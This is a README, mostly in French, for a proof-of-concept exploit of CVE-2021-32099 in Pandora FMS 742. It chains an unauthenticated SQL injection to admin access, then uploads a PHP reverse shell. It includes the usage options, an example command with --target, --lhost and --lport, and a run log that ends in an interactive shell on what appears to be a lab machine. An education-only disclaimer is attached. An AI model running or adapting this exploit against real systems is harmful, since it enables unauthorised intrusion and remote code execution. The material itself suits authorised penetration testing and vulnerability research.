
PoC for CVE-2021-32099
Ce dépôt fournit un exploit Preuve de Concept (PoC) pour la vulnérabilité CVE-2021-32099, affectant Pandora FMS 742. L'exploit montre comment un attaquant non authentifié peut exploiter une vulnérabilité d'injection SQL pour élever une session non privilégiée en un compte de niveau administrateur. Avec un accès administrateur, l'attaquant peut télécharger un fichier PHP arbitraire via le gestionnaire de fichiers de Pandora FMS, entraînant une exécution de code à distance et compromettant le serveur en tant qu'utilisateur du serveur web.
Ce projet est destiné uniquement à des fins éducatives, de recherche et de tests de sécurité autorisés.
N'utilisez pas ce code sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation explicite de tester.
L'auteur n'est pas responsable des dommages ou de toute utilisation abusive.
python3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py
usage: python3 ./CVE-2021-32099.py [--target TARGET] [--lhost LHOST] [--lport LPORT]
options:
--target TARGET Full URL of the vulnerable Pandora FMS instance.
--lhost LHOST IP address where the reverse shell will connect back to (must be reachable by the target). The listener will bind to 0.0.0.0 internally.
--lport LPORT Port number the reverse shell listener will bind to.
Example: python3 ./CVE-2021-32099.py --target http://target.com --lhost 10.10.14.157 --lport 4444
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py --target http://localhost --lhost 10.10.14.81 --lport 4444
[+] Bypassing authentication...OK
[+] Uploading reverse shell...OK
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.129.177.29 on port 37308
[+] Executing reverse shell...
[*] Switching to interactive mode
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
06:59:07 up 17:30, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$